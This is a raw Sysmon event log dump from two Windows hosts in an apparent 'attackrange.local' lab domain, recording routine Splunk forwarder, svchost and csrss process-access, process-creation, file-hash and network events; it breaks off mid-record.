21:46:58.970{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105033Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:58.970{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105032Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:58.970{54715871-FD16-60C9-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{54715871-7152-60CA-3013-00000000CF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000105031Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:58.969{54715871-FD28-60C9-3000-00000000CF01}24483280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{54715871-7152-60CA-3013-00000000CF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000105030Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:58.969{54715871-7152-60CA-3013-00000000CF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{54715871-FD16-60C9-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000105029Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:58.284{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=525C97876DBD40CE2427F7E5578F7DB3,SHA256=C93544476C3C09A67E077E5EE87EB25ED2D169C9830BAE82D9A5B8F1C7472139,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151672Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:58.637{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=116E1AF2EBE6565430A9C5DC1C789CEE,SHA256=97D1DCEAD4966E863315A50D984102B35275518300564E71677BABC30EAC6BF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105047Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:59.653{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=716D7DCBD33823F40952629E53B2E7ED,SHA256=AA10EE5FC02AAA39B66A156D3B4808ED07510407768A592E32F18CBF8AABB502,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105046Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:59.653{54715871-FD29-60C9-3700-00000000CF01}33683396C:\Windows\system32\conhost.exe{54715871-7153-60CA-3113-00000000CF01}3484C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105045Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:59.651{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105044Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:59.651{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105043Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:59.651{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105042Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:59.650{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105041Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:59.650{54715871-FD16-60C9-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{54715871-7153-60CA-3113-00000000CF01}3484C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000105040Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:59.650{54715871-FD28-60C9-3000-00000000CF01}24483280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{54715871-7153-60CA-3113-00000000CF01}3484C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000105039Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:59.649{54715871-7153-60CA-3113-00000000CF01}3484C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{54715871-FD16-60C9-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000105038Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:59.133{54715871-7152-60CA-3013-00000000CF01}23645404C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000151673Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:59.668{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D46DDFC694780999C31DDFB992FFF9D,SHA256=1E19AB5AD206D7E47BEA8BCC76F3BF9BD8D1A2898BD0887F7483B88BD8FABC7E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105056Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:00.801{54715871-7154-60CA-3213-00000000CF01}56604380C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105055Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:00.662{54715871-FD29-60C9-3700-00000000CF01}33683396C:\Windows\system32\conhost.exe{54715871-7154-60CA-3213-00000000CF01}5660C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105054Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:00.660{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105053Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:00.660{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105052Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:00.659{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105051Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:00.659{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105050Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:00.659{54715871-FD16-60C9-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{54715871-7154-60CA-3213-00000000CF01}5660C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000105049Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:00.659{54715871-FD28-60C9-3000-00000000CF01}24483280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{54715871-7154-60CA-3213-00000000CF01}5660C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000105048Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:00.659{54715871-7154-60CA-3213-00000000CF01}5660C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{54715871-FD16-60C9-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000151674Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:00.689{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F25AA78132CE5859A3F0DD890CA00F6,SHA256=21477A1D73D70BBFAA81DEDF870FA8D6777C37B707459073EC9571D88CD94E92,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000105057Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:59.699{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55429-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000151677Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:01.735{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CD739D2C95E4F1A28D4A1B587311542,SHA256=D62BA868224F60598ED8EEBECFFB85F2731578F8ECEC480898E524AD1A17ED8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151676Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:01.688{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=967A8112330EA11F72894910C9B2F7ED,SHA256=90ACFD82F87B2354C92CA3B678F20B8F8FA02D754CB6310A9DF8C8F46055E00D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151675Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:01.204{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4C7441F8F5E4289DFC5F6E70CF025023,SHA256=63D34CEDF12D46C1734CACC4313F8794CD9C7D69FA6EF51B4A221E702956C94E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105069Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:02.798{54715871-7156-60CA-3313-00000000CF01}3500676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program 